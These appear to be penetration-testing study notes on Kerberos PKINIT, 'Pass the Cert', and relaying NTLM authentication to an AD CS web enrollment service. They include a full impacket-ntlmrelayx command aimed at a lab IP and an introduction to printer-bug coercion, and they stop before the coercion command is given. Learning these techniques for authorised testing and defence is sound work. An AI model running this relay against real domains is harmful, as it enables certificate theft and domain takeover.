PKINIT, or Public Key Cryptography for Initial Authentication, is an extension of the Kerberos protocol that enables the use of public key cryptography during the initial authentication exchange.
Typically used to support user logins via smart cards.
Pass the Cert refers to using this mechanism to obtain a TGT.
And is primarily used to achieve attacks against AD CS and in Shadow Credential attacks.
Described in: https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
CA configured to allow web enrollment typically hosts the following application at: /CertSrv.
ntlmrelayx allows to listen for inbound connections and relay them to the web enrollment service using:
impacket-ntlmrelayx -t <http://10.129.234.110/certsrv/certfnsh.asp> --adcs -smb2support --template KerberosAuthentication
A way to force target machines to authenticate is to use the printer bug.
This requires the machine acccount to have the Printer Spooler service running.
To forcce $TARGET (ex: DC01) to authenticate against $ATTACKER: